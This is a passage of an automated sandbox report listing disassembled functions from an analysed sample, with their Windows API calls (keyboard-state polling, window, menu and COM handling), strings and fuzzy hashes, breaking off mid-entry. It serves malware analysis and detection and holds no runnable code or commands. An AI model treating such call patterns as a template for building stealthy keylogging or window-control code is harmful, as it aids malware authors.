Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 2a597e92c149037b2bdc975969a7eab8305766bf75a3a847e2d16127631b242f
Instruction ID: 079632ceadd0708559e75f6445e9c601d583a8f66be5737e66c4fade9d13b63b
Opcode Fuzzy Hash: 2a597e92c149037b2bdc975969a7eab8305766bf75a3a847e2d16127631b242f
Instruction Fuzzy Hash: D9110231904109AFDB18AB659C4EEEE7FBCFF81710F1841A6F08893091EFB09DC18A90

Function 005E5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 005E5535

Part of subcall function 005A083E: timeGetTime.WINMM(?,00000002,0058C22C), ref: 005A0842

Sleep.KERNEL32(0000000A), ref: 005E5561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 005E5585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005E55A7
SetActiveWindow.USER32 ref: 005E55C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005E55D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 005E55F3
Sleep.KERNEL32(000000FA), ref: 005E55FE
IsWindow.USER32 ref: 005E560A
EndDialog.USER32(00000000), ref: 005E561B

Strings

BUTTON, xrefs: 005E5599

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a192a795d08415fe50270937c5409045dedbf5266b856769ae3c3b9e25b6feb7
Instruction ID: db02b632bbad84aede780ce30c4618958541a428044a54b614401c9d9d384442
Opcode Fuzzy Hash: a192a795d08415fe50270937c5409045dedbf5266b856769ae3c3b9e25b6feb7
Instruction Fuzzy Hash: 7521D478204645AFFB885F61EC89A6A3F6BFB86348F447016F041821B1EFB15D90DA71

Function 005EDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

CoInitialize.OLE32(00000000), ref: 005EDC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005EDCC0
SHGetDesktopFolder.SHELL32(?), ref: 005EDCD4
CoCreateInstance.OLE32(00613D4C,00000000,00000001,0063B86C,?), ref: 005EDD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005EDD8F
CoTaskMemFree.OLE32(?,?), ref: 005EDDE7
_memset.LIBCMT ref: 005EDE24
SHBrowseForFolderW.SHELL32(?), ref: 005EDE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005EDE83
CoTaskMemFree.OLE32(00000000), ref: 005EDE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 005EDEC1
CoUninitialize.OLE32(00000001,00000000), ref: 005EDEC3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: fb649b793126db83b60b8b603ee051bf53ca123a08e1c2384e45163f8858df7f
Instruction ID: 8317b2d18712f4d24ae801ecc19d355cd4903fb95302cb7fce8ca55025aef064
Opcode Fuzzy Hash: fb649b793126db83b60b8b603ee051bf53ca123a08e1c2384e45163f8858df7f
Instruction Fuzzy Hash: E6B1EA75A00109EFDB14DFA5C888DAEBBF9FF88304B148459E949EB251DB70ED45CB60

Function 005E081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005E0896
SetKeyboardState.USER32(?), ref: 005E0901
GetAsyncKeyState.USER32(000000A0), ref: 005E0921
GetKeyState.USER32(000000A0), ref: 005E0938
GetAsyncKeyState.USER32(000000A1), ref: 005E0967
GetKeyState.USER32(000000A1), ref: 005E0978
GetAsyncKeyState.USER32(00000011), ref: 005E09A4
GetKeyState.USER32(00000011), ref: 005E09B2
GetAsyncKeyState.USER32(00000012), ref: 005E09DB
GetKeyState.USER32(00000012), ref: 005E09E9
GetAsyncKeyState.USER32(0000005B), ref: 005E0A12
GetKeyState.USER32(0000005B), ref: 005E0A20

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 30be0f2aaa80faea0da2cef7eb523b73cb13e4f2d550819d96a05c30b46ec5dc
Instruction ID: 5f2100cfb9cc540e45799204355c18b0aadd1a4d0381a2e5922fe3c1dbf620ca
Opcode Fuzzy Hash: 30be0f2aaa80faea0da2cef7eb523b73cb13e4f2d550819d96a05c30b46ec5dc
Instruction Fuzzy Hash: 5151D930A087C919FB39DBA244147AABFB5AF11380F085599D5C2571C3DAE49ACCCBA5

Function 005DCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 005DCE1C
GetWindowRect.USER32(00000000,?), ref: 005DCE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005DCE8C
GetDlgItem.USER32(?,00000002), ref: 005DCE97
GetWindowRect.USER32(00000000,?), ref: 005DCEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005DCEFD
GetDlgItem.USER32(?,000003E9), ref: 005DCF0B
GetWindowRect.USER32(00000000,?), ref: 005DCF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005DCF5F
GetDlgItem.USER32(?,000003EA), ref: 005DCF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005DCF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 005DCF97

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7a77e1ee1b03546f64296af070478d9f9479695e5d1d60a1aebd07f5302cc5fb
Instruction ID: 7f45e2a5306a079ee754050a37a78ae610deecf11fe0d3e025f79af1b8555d4d
Opcode Fuzzy Hash: 7a77e1ee1b03546f64296af070478d9f9479695e5d1d60a1aebd07f5302cc5fb
Instruction Fuzzy Hash: 41511071B00205AFDF18CF6DDD95AAEBBBAFB88710F14812AF515D6290DBB0AD40CB50

Function 00582581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 005829AB: GetWindowLongW.USER32(?,000000EB), ref: 005829BC

GetSysColor.USER32(0000000F), ref: 005825AF

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: aa0e863250e599c169eb5fb572c93985fdc0f0f7379ab3067a110b6d046d449b
Instruction ID: 5a36941575b258cb57fa93d778c7490255a658b356dbf7218be94e42fc7bc663
Opcode Fuzzy Hash: aa0e863250e599c169eb5fb572c93985fdc0f0f7379ab3067a110b6d046d449b
Instruction Fuzzy Hash: F641C330104104AFDF206F699888BF93F66FB0A331F184265FDA6AE1E5DB708C81DB21

Function 00584D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00584D62
__swprintf.LIBCMT ref: 00584DAC
__i64tow.LIBCMT ref: 005BDB3B

Strings

%.15g, xrefs: 00584DA6
True, xrefs: 005BDAFC
False, xrefs: 005BDB03
0x%p, xrefs: 005BDB1D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 0beadad79ae373de2eb6269895be18b716f6a1d029f35b5f46231b00aaa2eaa4
Instruction ID: f1bd9ef71cbb09c53c038d7e5ca6e60fe1f22e872aea5ec6e41a14715012ae90
Opcode Fuzzy Hash: 0beadad79ae373de2eb6269895be18b716f6a1d029f35b5f46231b00aaa2eaa4
Instruction Fuzzy Hash: 2041B77150460AAFDB24EF74D846E7A7BF8FB45300F20486EF949D7292FA31A941CB50

Function 00607777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060778F
CreateMenu.USER32 ref: 006077AA
SetMenu.USER32(?,00000000), ref: 006077B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00607846
IsMenu.USER32(?), ref: 0060785C
CreatePopupMenu.USER32 ref: 00607866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00607893
DrawMenuBar.USER32 ref: 0060789B

Strings

0, xrefs: 00607785
F, xrefs: 00607887

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 47970d2ab8ef2c149307ed712f2ca339f325a4d005a2dd4f870079ee7acd9739
Instruction ID: 316e2507149bccd2d59dc19c85824870a822ce0c72021f2832c630c133394934
Opcode Fuzzy Hash: 47970d2ab8ef2c149307ed712f2ca339f325a4d005a2dd4f870079ee7acd9739
Instruction Fuzzy Hash: EA414C74A00209EFEB14DF64D988ADA7BF6FF49310F148429F945A7390D771A910CF50

Function 00607AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00607B83
CreateCompatibleDC.GDI32(00000000), ref: 00607B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00607B9D
SelectObject.GDI32(00000000,00000000), ref: 00607BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00607BB0
DeleteDC.GDI32(00000000), ref: 00607BB9
GetWindowLongW.USER32(?,000000EC), ref: 00607BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00607BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00607BE3

Strings

static, xrefs: 00607B1B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: d06619533bd2e29a22173a435e0bf7b7e2503b9a88b73157d6ba2a200d6b267b
Instruction ID: 9f30ac7902300a0f18e94a10ff97a06f08151da7e06b9caed8a2c6596a2611cc
Opcode Fuzzy Hash: d06619533bd2e29a22173a435e0bf7b7e2503b9a88b73157d6ba2a200d6b267b
Instruction Fuzzy Hash: FF31AB32144218BBEF159FA4DC49FDB3B6AFF09320F145216FA15A22E0C771E860DBA4

Function 005A7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A706B

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

__gmtime64_s.LIBCMT ref: 005A7104
__gmtime64_s.LIBCMT ref: 005A713A
__gmtime64_s.LIBCMT ref: 005A7157
__allrem.LIBCMT ref: 005A71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A71C9
__allrem.LIBCMT ref: 005A71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A71FE
__allrem.LIBCMT ref: 005A7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005A7233
__invoke_watson.LIBCMT ref: 005A72A4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: a5127a4aedf1500f5a2ddc56642adf55ad797d2379cd1131fd585db91d646985
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 5B71F771A0471BABD7149E79CC45BAEBFA9BF5A320F14423AF514E7281E770ED408B90

Function 005E2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E2CE9
GetMenuItemInfoW.USER32(00647890,000000FF,00000000,00000030), ref: 005E2D4A
SetMenuItemInfoW.USER32(00647890,00000004,00000000,00000030), ref: 005E2D80
Sleep.KERNEL32(000001F4), ref: 005E2D92
GetMenuItemCount.USER32(?), ref: 005E2DD6
GetMenuItemID.USER32(?,00000000), ref: 005E2DF2
GetMenuItemID.USER32(?,-00000001), ref: 005E2E1C
GetMenuItemID.USER32(?,?), ref: 005E2E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005E2EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E2EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E2EDC

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 732d99a11be4a6ed6ac7ed29f4005fc9da15e402fbf7aa720dec655bd4fb2c6b
Instruction ID: bccb7082a074f1fbabdab0a14fb78812a05b15ddee7e1e62379bd6df5c6b46fd
Opcode Fuzzy Hash: 732d99a11be4a6ed6ac7ed29f4005fc9da15e402fbf7aa720dec655bd4fb2c6b
Instruction Fuzzy Hash: 05619B70900299AFDF18CF66CD88ABE7FAEFB41304F14445AF881A7255D771AE46CB20

Function 00607548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006075CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006075CD
GetWindowLongW.USER32(?,000000F0), ref: 006075F1
_memset.LIBCMT ref: 00607602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00607614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0060768C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: fddb4c5d0d58eebc45ceeaa555bac39d268b3bc0e388b8e4c5a380052b32210b
Instruction ID: f4a0de423b537906d0101855a9663c8bcd79e4d2d6d93db42f4412a40b5ff5a8
Opcode Fuzzy Hash: fddb4c5d0d58eebc45ceeaa555bac39d268b3bc0e388b8e4c5a380052b32210b
Instruction Fuzzy Hash: 5A617975940208AFDB11DFA4CC85EEE77F9EB09710F1041AAFA15A72E1D770AE41DBA0

Function 005D77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005D77DD
SafeArrayAllocData.OLEAUT32(?), ref: 005D7836
VariantInit.OLEAUT32(?), ref: 005D7848
SafeArrayAccessData.OLEAUT32(?,?), ref: 005D7868
VariantCopy.OLEAUT32(?,?), ref: 005D78BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 005D78CF
VariantClear.OLEAUT32(?), ref: 005D78E4
SafeArrayDestroyData.OLEAUT32(?), ref: 005D78F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005D78FA
VariantClear.OLEAUT32(?), ref: 005D790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005D7917

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9ea217c818aa425db3bad4c1776d32e3ab4aa0eeaa2c52df8def875504e1406a
Instruction ID: 394a2261ccd19bf2e8657b11ece1fad9d97e22beecb0fa42ec88cfce05d8301c
Opcode Fuzzy Hash: 9ea217c818aa425db3bad4c1776d32e3ab4aa0eeaa2c52df8def875504e1406a
Instruction Fuzzy Hash: 79411A35A0021DDFDB109FA8D8889EDBBB9FF48300F04846AE955A7361DB70A985CB90

Function 005E0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 005E0530
GetAsyncKeyState.USER32(000000A0), ref: 005E05B1
GetKeyState.USER32(000000A0), ref: 005E05CC
GetAsyncKeyState.USER32(000000A1), ref: 005E05E6
GetKeyState.USER32(000000A1), ref: 005E05FB
GetAsyncKeyState.USER32(00000011), ref: 005E0613
GetKeyState.USER32(00000011), ref: 005E0625
GetAsyncKeyState.USER32(00000012), ref: 005E063D
GetKeyState.USER32(00000012), ref: 005E064F
GetAsyncKeyState.USER32(0000005B), ref: 005E0667
GetKeyState.USER32(0000005B), ref: 005E0679

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2467314dcb3d70b494c5c02dd4bff22b9654dc98aac6db0e567467729c96842c
Instruction ID: d79303ffcd7e638a9c876cc21c736bb0134fe4976a4b636f4f6a593c2370602f
Opcode Fuzzy Hash: 2467314dcb3d70b494c5c02dd4bff22b9654dc98aac6db0e567467729c96842c
Instruction Fuzzy Hash: 8041E7305047CA6DFF388B6589043B5BEA17B51304F08A09BD5C64B5C2EBE899D8CFA2

Function 005F97FD Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F9851
VariantInit.OLEAUT32(?), ref: 005F9922
VariantInit.OLEAUT32(?), ref: 005F9A23
VariantClear.OLEAUT32(?), ref: 005F9A2D
VariantClear.OLEAUT32(?), ref: 005F9A8A

Strings

get__NewEnum, xrefs: 005F9829
Incorrect Object type in FOR..IN loop, xrefs: 005F9A06
_NewEnum, xrefs: 005F980B
Null Object assignment in FOR..IN loop, xrefs: 005F98B2, 005F99E0, 005F9A98

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 2862541840-1765764032
Opcode ID: c7a3ccd54b4701f6867d83a6c2c11045f7afd4eace9af0fd1c8e105bd547528f
Instruction ID: 14b9748b935bc44aae8e97c01e86836d97cff142a11c86bcc7bd50f4fb0de7d6
Opcode Fuzzy Hash: c7a3ccd54b4701f6867d83a6c2c11045f7afd4eace9af0fd1c8e105bd547528f
Instruction Fuzzy Hash: BF917C30A0061AABDF24CFA5C848FAEBBB8FF85710F10855DF655AB240D7749944CFA0

Function 005F8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00584D37: __itow.LIBCMT ref: 00584D62
Part of subcall function 00584D37: __swprintf.LIBCMT ref: 00584DAC

CoInitialize.OLE32 ref: 005F8AED
CoUninitialize.OLE32 ref: 005F8AF8
CoCreateInstance.OLE32(?,00000000,00000017,00613BBC,?), ref: 005F8B58
IIDFromString.OLE32(?,?), ref: 005F8BCB
VariantInit.OLEAUT32(?), ref: 005F8C65
VariantClear.OLEAUT32(?), ref: 005F8CC6

Strings

NULL Pointer assignment, xrefs: 005F8B9D
Failed to create object, xrefs: 005F8B63, 005F8C19
Invalid parameter, xrefs: 005F8BE4

Memory Dump Source

